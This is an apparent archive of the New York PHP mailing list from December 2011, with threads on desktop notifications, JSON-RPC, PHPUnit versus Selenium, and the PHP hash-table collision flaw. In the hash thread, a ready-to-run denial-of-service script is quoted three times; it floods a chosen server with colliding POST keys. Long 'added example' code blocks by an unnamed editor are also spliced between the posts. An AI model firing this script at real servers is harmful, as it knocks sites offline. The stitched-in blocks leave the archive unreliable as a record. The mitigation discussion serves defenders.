From seesgeez at gmail.com Thu Dec 1 13:25:02 2011
From: seesgeez at gmail.com (Carla Gomez)
Date: Thu, 1 Dec 2011 13:25:02 -0500
Subject: [nycphp-talk] Desktop timed notice
Message-ID: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com>

I am interested in notifying desktop users that it is time to fill out a survey. How may I go about this notification that will come at set times with a link to the website?

Sent from my iPhone

From appel at alsjeblaft.nl Thu Dec 1 13:39:37 2011
From: appel at alsjeblaft.nl (Ap | Alsjeblaft!)
Date: Thu, 1 Dec 2011 19:39:37 +0100
Subject: [nycphp-talk] Desktop timed notice
In-Reply-To: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com>
References: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com>

Snail mail?

--
*Alsjeblaft!* webdevelopment
Stuff I've built: wende.nu, happycampermusic.com, dazzledkid.com, arthurjussen.nl, schradinova.nl, roomeleven.nl & studiopino.nl
appel at alsjeblaft.nl
http://www.alsjeblaft.nl/

On Thu, Dec 1, 2011 at 7:25 PM, Carla Gomez wrote:
> I am interested in notifying desktop users that it is time to fill out a
> survey. How may I go about this notification that will come at set times
> with a link to the website?
>
> Sent from my iPhone
> _______________________________________________
> New York PHP Users Group Community Talk Mailing List
> http://lists.nyphp.org/mailman/listinfo/talk
>
> http://www.nyphp.org/Show-Participation

From bruce.amick at gmail.com Thu Dec 1 13:42:16 2011
From: bruce.amick at gmail.com (bruce amick)
Date: Thu, 1 Dec 2011 13:42:16 -0500
Subject: [nycphp-talk] Desktop timed notice
In-Reply-To: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com>
References: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com>

Carla,

Perhaps the quickest and easiest way would be to use gmail's calendar feature and set up a recurring appointment with a reminder email.

Or...

Hire a programmer.

-Bruce

On Thu, Dec 1, 2011 at 1:25 PM, Carla Gomez wrote:
> I am interested in notifying desktop users that it is time to fill out a
> survey. How may I go about this notification that will come at set times
> with a link to the website?
>
> Sent from my iPhone

From seesgeez at gmail.com Thu Dec 1 13:48:18 2011
From: seesgeez at gmail.com (Carla Gomez)
Date: Thu, 1 Dec 2011 13:48:18 -0500
Subject: [nycphp-talk] Desktop timed notice
In-Reply-To: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com>
References: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com>
Message-ID: <4EF7CE38-9BFE-4841-831F-DB059BC61CD2@gmail.com>

Thanks Bruce.

Sent from my iPhone

On Dec 1, 2011, at 1:42 PM, bruce amick wrote:
> Carla,
>
> Perhaps the quickest and easiest way would be to use gmail's calendar feature and set up a recurring appointment with a reminder email.
>
> Or...
>
> Hire a programmer.
>
> -Bruce
>
> On Thu, Dec 1, 2011 at 1:25 PM, Carla Gomez wrote:
> I am interested in notifying desktop users that it is time to fill out a survey. How may I go about this notification that will come at set times with a link to the website?
>
> Sent from my iPhone

From winterbeef at gmail.com Fri Dec 2 17:02:44 2011
From: winterbeef at gmail.com (Wellington Fan)
Date: Fri, 02 Dec 2011 17:02:44 -0500
Subject: [nycphp-talk] Favorite JSON-RPC Server?
Message-ID: <4ED94B04.9000000@gmail.com>

Hi all,

Anyone have a favorite PHP implementation of a JSON-RPC Server?

Thanks!

--
wellington

From rakics at gmail.com Fri Dec 2 17:13:31 2011
From: rakics at gmail.com (Sasa Rakic)
Date: Fri, 2 Dec 2011 23:13:31 +0100
Subject: [nycphp-talk] Favorite JSON-RPC Server?
In-Reply-To: <4ED94B04.9000000@gmail.com>
References: <4ED94B04.9000000@gmail.com>

http://json-rpc.org/wiki/implementations

On Fri, Dec 2, 2011 at 11:02 PM, Wellington Fan wrote:
> JSON-RPC Server?

From garyamort at gmail.com Wed Dec 21 13:37:03 2011
From: garyamort at gmail.com (Gary A Mort)
Date: Wed, 21 Dec 2011 13:37:03 -0500
Subject: [nycphp-talk] Desktop timed notice
In-Reply-To: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com>
References: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com>
Message-ID: <4EF2274F.3030807@gmail.com>

There are soooo many ways to do this, it all depends on what mediums your users use already.

Send them an email with a link at a specific time via:
Email
Instant Message [skype, aim, gtalk, yahoo, etc]
Tweet it and have them follow the twitter feed
Setup a website with desktop notifications enabled and have them keep that page open.
http://technews.am/conversations/ajaxian/desktop_notifications_with_webkit

If your users are predominantly Mac users, Growl is pretty cool http://growl.info/ and there is a windows, iphone, and android app for it as well

On 12/1/2011 1:25 PM, Carla Gomez wrote:
> I am interested in notifying desktop users that it is time to fill out a survey. How may I go about this notification that will come at set times with a link to the website?
>
> Sent from my iPhone

From mkfmncom at gmail.com Wed Dec 21 17:46:53 2011
From: mkfmncom at gmail.com (M Kaufman (Gmail))
Date: Wed, 21 Dec 2011 14:46:53 -0800
Subject: [nycphp-talk] Desktop timed notice
In-Reply-To: <4EF2274F.3030807@gmail.com>
References: <30A6CFA5-A941-4E84-A5DC-D1B0DF016FAA@gmail.com> <4EF2274F.3030807@gmail.com>

XMPP is the best way with the server running a prosody or ejabberd server. Do not use Twitter or Email nor rely on Webkit or any other proprietary networked solution outside of your control.

You can use Zenity or XMPP to alert the desktop. XMPP is the preferred protocol since you are alerting users at their presence and availability.

I provide consulting on these topics on retainer and can implement customized solutions at hardware, network, server, client machine and web integrations to your existing or new setup at 1-703-881-6906, on or off site in the US.

Matthew Kaufman.

Sent from my iPhone

On Dec 21, 2011, at 10:37 AM, Gary A Mort wrote:
> There are soooo many ways to do this, it all depends on what mediums your users use already.
>
> Send them an email with a link at a specific time via:
> Email
> Instant Message [skype, aim, gtalk, yahoo, etc]
> Tweet it and have them follow the twitter feed
> Setup a website with desktop notifications enabled and have them keep that page open.
> http://technews.am/conversations/ajaxian/desktop_notifications_with_webkit
>
> If your users are predominantly Mac users, Growl is pretty cool http://growl.info/ and there is a windows, iphone, and android app for it as well
>
> On 12/1/2011 1:25 PM, Carla Gomez wrote:
>> I am interested in notifying desktop users that it is time to fill out a survey. How may I go about this notification that will come at set times with a link to the website?
>>
>> Sent from my iPhone

From nelly at cgim.com Tue Dec 27 13:38:10 2011
From: nelly at cgim.com (Nelly Yusupova)
Date: Tue, 27 Dec 2011 13:38:10 -0500
Subject: [nycphp-talk] Unit Testing with PHP: PHPUnit and Selenium

Hello Everyone,

We are setting up an environment for running unit tests for our PHP application.

We installed the PHPUnit testing framework and were thinking of using it with Selenium. There are lots of examples online of people who used PHPUnit & Selenium together, but I've read that the support of PHP in Selenium is deprecated and I'm wondering if this is the right way to go.

I would love to hear your experiences with PHP unit testing frameworks and, if you are using unit testing, what your set up looks like.

Thank you in advance for your responses.

Sincerely,
Nelly Yusupova
Digitalwoman.com
nelly at digitalwoman.com
917 603-9226 (phone)
URL: http://www.digitalwoman.com
Blog: http://www.webgrrls.com/blog/
Twitter: http://twitter.com/DigitalWoman
From rmarscher at beaffinitive.com Tue Dec 27 13:57:36 2011
From: rmarscher at beaffinitive.com (Rob Marscher)
Date: Tue, 27 Dec 2011 13:57:36 -0500
Subject: [nycphp-talk] Unit Testing with PHP: PHPUnit and Selenium
Message-ID: <03A2151D-92FB-46C7-AB2C-E1397ECB547D@beaffinitive.com>

On Dec 27, 2011, at 1:38 PM, Nelly Yusupova wrote:
> We are setting up an environment for running unit tests for our PHP application.
>
> We installed the PHPUnit testing framework and were thinking of using it with Selenium. There are lots of examples online of people who used PHPUnit & Selenium together, but I've read that the support of PHP in Selenium is deprecated and I'm wondering if this is the right way to go.
>
> I would love to hear your experiences with PHP unit testing frameworks and, if you are using unit testing, what your set up looks like.

I've yet to do it, but running a WebDriver server sounds pretty cool: http://code.google.com/p/selenium/wiki/RemoteWebDriverServer

I'm pretty sure WebDriver is just the name for what Selenium has become. The php bindings have activity from this fall: http://code.google.com/p/php-webdriver-bindings/source/list

I wouldn't really say that using Selenium or WebDriver would be considered a "unit test" as much as it is functional and/or integration testing. PHPUnit is still pretty good for testing and integrates well with continuous integration servers (I have it running with Atlassian Bamboo). I've been using the Lithium framework which also has a nice built-in test suite: http://lithify.me/docs/manual/quality-code/testing.wiki

-Rob
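An added example of the unit-test side of the distinction Rob draws (editor's code, not Rob's or any other poster's): a PHPUnit test that exercises one class in isolation, with no browser, no HTTP and no database, so it runs in milliseconds under PHPUnit alone. It assumes PHPUnit 9 or later installed with Composer (PHPUnit\Framework\TestCase, setUp(): void); the Validate_Numeric class is hypothetical and is declared in the same file so that the example is self-contained. The class is a deliberately strict numeric validator, and the second test method shows the inputs such a validator tends to get wrong.

```php
<?php
// Added example, not code from any poster. One class under test plus its
// PHPUnit test case in a single file so it runs as-is:
//   vendor/bin/phpunit NumericTest.php
// Assumes PHPUnit 9+ via Composer; Validate_Numeric is hypothetical.

use PHPUnit\Framework\TestCase;

class Validate_Numeric
{
    // Optional sign, then digits with an optional fraction. Deliberately
    // narrower than is_numeric(), which (depending on PHP version) also
    // accepts leading or trailing whitespace, exponents such as "1e3" and,
    // on PHP 5, hex such as "0x1A". The anchor is \z rather than $ because
    // $ also matches before a trailing newline, so "42\n" would slip through.
    const PATTERN = '/^[+-]?(?:\d+(?:\.\d+)?|\.\d+)\z/';

    public function isValid($value)
    {
        if (!is_string($value) && !is_int($value) && !is_float($value)) {
            return false;
        }
        return preg_match(self::PATTERN, (string) $value) === 1;
    }
}

class Validate_NumericTest extends TestCase
{
    private $validator;

    protected function setUp(): void
    {
        $this->validator = new Validate_Numeric();
    }

    public function testAcceptsPlainNumbers()
    {
        foreach (array('0', '42', '-17', '+3', '3.14', '.5', 7, 2.5) as $input) {
            $this->assertTrue($this->validator->isValid($input), var_export($input, true));
        }
    }

    public function testRejectsLooseOrMalformedStrings()
    {
        // Several of these pass is_numeric() on some PHP versions; none
        // should reach a quantity, price or ID field unchanged.
        foreach (array(' 42', "42\n", '1e3', '0x1A', '1.', '', '-') as $input) {
            $this->assertFalse($this->validator->isValid($input), var_export($input, true));
        }
    }

    public function testRejectsNonScalars()
    {
        foreach (array(null, true, array(42), new stdClass()) as $input) {
            $this->assertFalse($this->validator->isValid($input));
        }
    }
}
```

The message argument to assertTrue/assertFalse carries the offending input, so a failure names the exact string that got through rather than just the loop. Everything here is pure PHP, which is what makes it a unit test: the moment the same check needs a browser or a running server, it has become the functional test Rob describes, and belongs in a separate, slower suite.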
From arzala at gmail.com Wed Dec 28 01:50:56 2011
From: arzala at gmail.com (Anirudhsinh Zala)
Date: Wed, 28 Dec 2011 12:20:56 +0530
Subject: [nycphp-talk] Unit Testing with PHP: PHPUnit and Selenium
Message-ID: <201112281220.56409.arzala@gmail.com>

On Wednesday 28 December 2011 00:08:10 Nelly Yusupova wrote:
> Hello Everyone,
>
> We are setting up an environment for running unit tests for our PHP
> application.
>
> We installed the PHPUnit testing framework and were thinking of using it with
> Selenium. There are lots of examples online of people who used PHPUnit &
> Selenium together, but I've read that the support of PHP in Selenium is
> deprecated and I'm wondering if this is the right way to go.
>
> I would love to hear your experiences with PHP unit testing frameworks and,
> if you are using unit testing, what your set up looks like.

I suggest, from my experience, not to use Selenium and tools etc. to make/run unit tests because Selenium is primarily to run functional tests, which are very different from unit tests. For unit tests, you would mostly use PHPUnit itself.

So for now, for unit testing of PHP based code, PHPUnit is the de-facto software. There are others but not as widely used as PHPUnit. Please find some generic guidelines below:

1. You should maintain the hierarchy of classes as well as their equivalent test cases in the same way. So for example if a class file is grouped as lib/Validate/Numeric.php then its corresponding test case should also be grouped as test/unit/Validate/NumericTest.php. Moreover the name of the test case class should also follow the name of the class that is to be tested, as shown below:

Class to be tested: Validate_Numeric
Test case class: Validate_NumericTest

Please check how frameworks like Zend etc. do it.

2. It is recommended to write test cases for the logical part only, i.e. static code/data need not get tested. For complex test cases such as for Database, Mailing etc., it may require certain environmental settings.

3. Fixtures (such as images, data files etc.) of test cases should be kept in the same folder where the test case/s reside/s. However larger contents can be put in a separate folder.

4. All test cases are to be run from the project's base directory only. This is necessary because it is required to generate agile documentation of unit test cases and their classes.

5. All test cases should also be grouped into a suite to run all of them at a time.

My advice is not to use Selenium etc. for unit testing at all as Selenium is best suited for functional tests only.

Thanks
@anirudh

> Thank you in advance for your responses.
>
> Sincerely,
> Nelly Yusupova
> Digitalwoman.com
> nelly at digitalwoman.com
> 917 603-9226 (phone)
> URL: http://www.digitalwoman.com
> Blog: http://www.webgrrls.com/blog/
> Twitter: http://twitter.com/DigitalWoman

From ramons at gmx.net Wed Dec 28 08:45:38 2011
From: ramons at gmx.net (David Krings)
Date: Wed, 28 Dec 2011 08:45:38 -0500
Subject: [nycphp-talk] Unit Testing with PHP: PHPUnit and Selenium
Message-ID: <4EFB1D82.50808@gmx.net>

On 12/27/2011 1:38 PM, Nelly Yusupova wrote:
> Hello Everyone,
>
> We are setting up an environment for running unit tests for our PHP application.
>
> We installed the PHPUnit testing framework and were thinking of using it with
> Selenium.

Hi!

While I have no experience with these two test frameworks, I did use automated test tools and test frameworks before and my experience so far is that you just end up with more code that contains bugs, the ones in your code and the ones in the test tool. Nevertheless, I see a place for automated testing, but that is not in new development. Write detailed test plans for all new development and run the first few rounds of testing manually, from unit tests to functional tests to whatever else someone came up with a name for. Once you have documented evidence that the code is fine and fulfills all the requirements, then use the test plans to write the automated tests. Once the automation is in place, run it and test the results it produces against the test plan. Only after the manual and automatic test results match can you continue using exclusively the automated tests, which are then only running against established code and are used to make sure that any new development doesn't break any existing functionality. And those tests are then done in a matter of minutes, saving time.

Maybe this is the approach you already take, but many consider automated testing a 1:1 replacement for manual testing and writing test plans. While there may be some amount of problems detected that way, you will miss a lot. In either case, which procedure is to be used to test the test scripts? Automated testing? You need to put in a lot of effort up front to get reliable results from automated testing. The question is then if there is a point to that when products have a life span of a year, like most of the hot new web apps. There is no point in extensive testing when the whole thing is outdated shortly after, which is the reason why many (not all) of the Google and FB products (to just name a few) are of mediocre quality. It is a business decision.

Just my 2 cents from over a decade of QA work....

David

From hans at cyberxdesigns.com Thu Dec 29 11:19:33 2011
From: hans at cyberxdesigns.com (Hans C. Kaspersetz)
Date: Thu, 29 Dec 2011 11:19:33 -0500
Subject: [nycphp-talk] Hash Table Vulnerability in PHP5
Message-ID: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com>

Good morning,

I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos-massive-scale or here http://www.kb.cert.org/vuls/id/903934.

It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, as with all release candidates, they are strongly advising against using it in production.

What is the general consensus for mitigating this risk without moving to RC5?

We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time, which I imagine would leave those scripts more vulnerable.

Thanks,
Hans Kaspersetz
Cyber X Designs
http://cyberxdesigns.com

From ben at projectskyline.com Thu Dec 29 11:33:20 2011
From: ben at projectskyline.com (Ben Sgro)
Date: Thu, 29 Dec 2011 11:33:20 -0500
Subject: [nycphp-talk] Hash Table Vulnerability in PHP5
In-Reply-To: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com>
References: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com>

Hey,

Don't allow posts with > ~100 k/v pairs. Don't allow larger uploads than is necessary. As you mentioned, I guess limit script execution time.
Right now, there's some snort signatures going around (Not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex to strip out these bad chars.

I have a PoC here you can test against your servers: (And here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html)

    <?php
    // v--- ripped from: https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
    //
    // generate POST of Doom
    function doom() {
        // entries with collisions in PHP hashtable hash function
        $a = array(
            '0' => 'Ez',
            '1' => 'FY',
            '2' => 'G8',
            '3' => 'H' . chr(23),
            '4' => 'D' . chr(122 + 33),
        );
        // how long should the payload be (in blocks); 5^7 = 78125 colliding keys
        $length = 7;

        $size = count($a);

        $post = '';
        $max = pow($size, $length);
        for ($i = 0; $i < $max; $i++) {
            // write $i in base 5 and map each digit to a colliding block
            $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT);
            $post .= '' . (urlencode(strtr($s, $a))) . '=&';
        }

        return $post;
    }

    // hashcollider.php
    // by sk
    // usage: php hashcollider.php -h http://target/script.php

    $post = doom();
    $ch = curl_init();
    $args = getopt("h:");
    $host = $args['h'];

    curl_setopt($ch, CURLOPT_URL, $host);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

    printf("[x] Target: %s\n", $host);
    printf("[x] CPU spike!\n");
    $result = curl_exec($ch);
    printf("[x] Payload sent.\n");

Good luck!

- Ben

On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote:
> Good morning,
>
> I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos-massive-scale or here http://www.kb.cert.org/vuls/id/903934.
>
> It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, as with all release candidates, they are strongly advising against using it in production.
>
> What is the general consensus for mitigating this risk without moving to RC5?
>
> We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time, which I imagine would leave those scripts more vulnerable.
>
> Thanks,
> Hans Kaspersetz
> Cyber X Designs
> http://cyberxdesigns.com

From hans at cyberxdesigns.com Thu Dec 29 18:19:32 2011
From: hans at cyberxdesigns.com (Hans C. Kaspersetz)
Date: Thu, 29 Dec 2011 18:19:32 -0500
Subject: [nycphp-talk] Hash Table Vulnerability in PHP5
In-Reply-To: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com>
References: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com>
Message-ID: <00ff01ccc680$52ab3fd0$f801bf70$@cyberxdesigns.com>

Ben,

Thanks for the reply. I ran the PoC below against my servers and it looks like we are in ok shape. After reading your response, I contemplated the options and realized that we are running Suhosin and are already managing the max post|request variables. Dur...

Here is a bit more reading for the group: http://seclists.org/fulldisclosure/2011/Dec/486.

Have a great new year!

Hans Kaspersetz
Cyber X Designs
http://cyberxdesigns.com

From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org] On Behalf Of Ben Sgro
Sent: Thursday, December 29, 2011 11:33 AM
To: NYPHP Talk
Subject: Re: [nycphp-talk] Hash Table Vulnerability in PHP5

Hey,

Don't allow posts with > ~100 k/v pairs. Don't allow larger uploads than is necessary. As you mentioned, I guess limit script execution time.
Right now, there's some snort signatures going around (Not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex to strip out these bad chars.

I have a PoC here you can test against your servers: (And here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html)

    <?php
    // v--- ripped from: https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
    //
    // generate POST of Doom
    function doom() {
        // entries with collisions in PHP hashtable hash function
        $a = array(
            '0' => 'Ez',
            '1' => 'FY',
            '2' => 'G8',
            '3' => 'H' . chr(23),
            '4' => 'D' . chr(122 + 33),
        );
        // how long should the payload be
        $length = 7;

        $size = count($a);

        $post = '';
        $max = pow($size, $length);
        for ($i = 0; $i < $max; $i++) {
            $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT);
            $post .= '' . (urlencode(strtr($s, $a))) . '=&';
        }

        return $post;
    }

    // hashcollider.php
    // by sk

    $post = doom();
    $ch = curl_init();
    $args = getopt("h:");
    $host = $args['h'];

    curl_setopt($ch, CURLOPT_URL, $host);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

    printf("[x] Target: %s\n", $host);
    printf("[x] CPU spike!\n");
    $result = curl_exec($ch);
    printf("[x] Payload sent.\n");

Good luck!

- Ben

On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote:

Good morning,

I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos-massive-scale or here http://www.kb.cert.org/vuls/id/903934.

It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, as with all release candidates, they are strongly advising against using it in production.

What is the general consensus for mitigating this risk without moving to RC5?

We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time, which I imagine would leave those scripts more vulnerable.

Thanks,
Hans Kaspersetz
Cyber X Designs
http://cyberxdesigns.com
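A worked example added by the editor, not code from Ben, Hans, the PoC's author or PHP itself: the DJBX33A string hash that PHP 5 uses for array keys, reimplemented to check that the PoC's five two-byte blocks collide and that keys built only from those blocks keep colliding at any length, followed by the count-based guard that the thread's two working mitigations apply (max_input_vars, which shipped as a stable directive in PHP 5.3.9 and 5.4.0 with a default of 1000, and Suhosin's suhosin.post.max_vars / suhosin.request.max_vars). It puts numbers on two points raised above: an execution-time limit caps the damage per request but not the cost per request, and a character-stripping rewrite rule cannot work, because three of the five colliding blocks ('Ez', 'FY', 'G8') are plain alphanumerics. Function and file names are the editor's own; the code is PHP 5.3+ and PHP 7/8 compatible and needs no extensions.

```php
<?php
// Added example for this thread, not code from any poster or from PHP.
// Run from the CLI on the production build:  php hash_collision_check.php
//
// Part 1 re-implements the string hash PHP 5 uses for array keys (DJBX33A:
// start at 5381, then h = h*33 + byte) to show why the PoC's blocks collide.
// Part 2 is the pre-parse guard max_input_vars and Suhosin's *.max_vars apply.

// DJBX33A over the raw bytes of $key. Masking to 32 bits each step only keeps
// PHP's integer from overflowing into a float; the colliding strings hash to
// identical integers before any masking, so the result holds at any width.
function djbx33a($key) {
    $h = 5381;
    $n = strlen($key);
    for ($i = 0; $i < $n; $i++) {
        $h = (($h * 33) + ord($key[$i])) & 0xFFFFFFFF;
    }
    return $h;
}

// The five colliding two-byte blocks from the PoC in this thread.
function collidingBlocks() {
    return array('Ez', 'FY', 'G8', 'H' . chr(23), 'D' . chr(155));
}

// True when every block hashes to the same value.
function blocksCollide() {
    $hashes = array_map('djbx33a', collidingBlocks());
    return count(array_unique($hashes)) === 1;
}

// The i-th key of $blocksPerKey blocks: write $i in base 5 and map each digit
// to a block, exactly as the PoC's doom() does.
function buildKey($i, $blocksPerKey) {
    $blocks = collidingBlocks();
    $digits = str_pad(base_convert((string) $i, 10, count($blocks)), $blocksPerKey, '0', STR_PAD_LEFT);
    $key = '';
    for ($j = 0, $len = strlen($digits); $j < $len; $j++) {
        $key .= $blocks[(int) $digits[$j]];
    }
    return $key;
}

// Number of distinct hash values among the first $count generated keys.
// 1 means every key lands in one bucket, which turns the table's bucket into
// a linked list and each insert into a scan of everything inserted so far.
function distinctHashes($count, $blocksPerKey) {
    $seen = array();
    for ($i = 0; $i < $count; $i++) {
        $seen[djbx33a(buildKey($i, $blocksPerKey))] = true;
    }
    return count($seen);
}

// Upper bound on the key/value pairs in a urlencoded body, found without
// parsing it. PHP fills $_POST before user code runs, so in practice this
// count is done by max_input_vars or suhosin.post.max_vars, but the logic is
// the same: it runs before any key is hashed and it is a count, not a filter.
function countPairs($body) {
    return $body === '' ? 0 : substr_count($body, '&') + 1;
}

function exceedsLimit($body, $limit = 1000) {
    return countPairs($body) > $limit;
}

// What the running PHP has in place. ini_get() returns false for a directive
// this build does not know: max_input_vars before 5.3.9, or the suhosin.*
// settings without the Suhosin extension loaded.
function inputLimits() {
    return array(
        'max_input_vars'           => ini_get('max_input_vars'),
        'suhosin.post.max_vars'    => ini_get('suhosin.post.max_vars'),
        'suhosin.request.max_vars' => ini_get('suhosin.request.max_vars'),
        'max_execution_time'       => ini_get('max_execution_time'),
    );
}

if (PHP_SAPI === 'cli') {
    printf("five blocks collide: %s\n", blocksCollide() ? 'yes' : 'no');
    printf("distinct hashes among 625 keys of 4 blocks: %d\n", distinctHashes(625, 4));

    // A constructed body in the PoC's format (key=&key=&...), 1500 pairs.
    $body = '';
    for ($i = 0; $i < 1500; $i++) {
        $body .= urlencode(buildKey($i, 5)) . '=&';
    }
    printf("pairs in body: %d, over default limit of 1000: %s\n",
        countPairs($body), exceedsLimit($body) ? 'yes' : 'no');
    foreach (inputLimits() as $name => $value) {
        printf("%-26s %s\n", $name, var_export($value, true));
    }
}
```

On a build without Suhosin and older than 5.3.9 the last block prints false for all three var limits, which is the configuration the thread is worried about; max_execution_time is reported alongside because, as Hans notes, raising it for upload handlers widens the window a single colliding request gets. Checking the limits from the CLI is only a first pass: the CLI SAPI ignores max_execution_time and may read a different php.ini than the web SAPI, so confirm the same values from a phpinfo() served by the real web server.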
From ben at projectskyline.com Thu Dec 29 19:41:08 2011
From: ben at projectskyline.com (Ben Sgro)
Date: Thu, 29 Dec 2011 19:41:08 -0500
Subject: [nycphp-talk] Hash Table Vulnerability in PHP5
In-Reply-To: <00ff01ccc680$52ab3fd0$f801bf70$@cyberxdesigns.com>
References: <006301ccc645$a6b73790$f425a6b0$@cyberxdesigns.com> <00ff01ccc680$52ab3fd0$f801bf70$@cyberxdesigns.com>
Message-ID: <2AD511FA-D2F0-4CCE-81A8-9CF9839447B4@projectskyline.com>

Hey Hans,

Yeah Suhosin will take care of this issue. Glad to hear you are running it!

- Ben

On Dec 29, 2011, at 6:19 PM, Hans C. Kaspersetz wrote:
> Ben,
>
> Thanks for the reply. I ran the PoC below against my servers and it looks like we are in ok shape. After reading your response, I contemplated the options and realized that we are running Suhosin and are already managing the max post|request variables. Dur...
>
> Here is a bit more reading for the group: http://seclists.org/fulldisclosure/2011/Dec/486.
>
> Have a great new year!
>
> Hans Kaspersetz
> Cyber X Designs
> http://cyberxdesigns.com
>
>
> From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org] On Behalf Of Ben Sgro
> Sent: Thursday, December 29, 2011 11:33 AM
> To: NYPHP Talk
> Subject: Re: [nycphp-talk] Hash Table Vulnerability in PHP5
>
> Hey,
>
> Don't allow posts with > ~100 k/v pairs. Don't allow larger uploads than is necessary. As you mentioned, I guess limit script execution time.
> Right now, there's some snort signatures going around (Not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex
> to strip out these bad chars.
>
> I have a PoC here you can test against your servers: (And here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html)
>
> <?php
> // v--- ripped from: https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
> //
> // generate POST of Doom
> function doom() {
>     // entries with collisions in PHP hashtable hash function
>     $a = array(
>         '0' => 'Ez',
>         '1' => 'FY',
>         '2' => 'G8',
>         '3' => 'H' . chr(23),
>         '4' => 'D' . chr(122 + 33),
>     );
>     // how long should the payload be
>     $length = 7;
>
>     $size = count($a);
>
>     $post = '';
>     $max = pow($size, $length);
>     for ($i = 0; $i < $max; $i++) {
>         $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT);
>         $post .= '' . (urlencode(strtr($s, $a))) . '=&';
>     }
>
>     return $post;
> }
>
> // hashcollider.php
> // by sk
>
> $post = doom();
> $ch = curl_init();
> $args = getopt("h:");
> $host = $args['h'];
>
> curl_setopt($ch, CURLOPT_URL, $host);
> curl_setopt($ch, CURLOPT_POST, 1);
> curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
>
> printf("[x] Target: %s\n", $host);
> printf("[x] CPU spike!\n");
> $result = curl_exec($ch);
> printf("[x] Payload sent.\n");
>
> Good luck!
>
> - Ben
>
> On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote:
>
> Good morning,
>
> I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos-massive-scale or here http://www.kb.cert.org/vuls/id/903934.
>
> It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, as with all release candidates, they are strongly advising against using it in production.
>
> What is the general consensus for mitigating this risk without moving to RC5?
>
> We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time, which I imagine would leave those scripts more vulnerable.
>
> Thanks,
> Hans Kaspersetz
> Cyber X Designs
> http://cyberxdesigns.com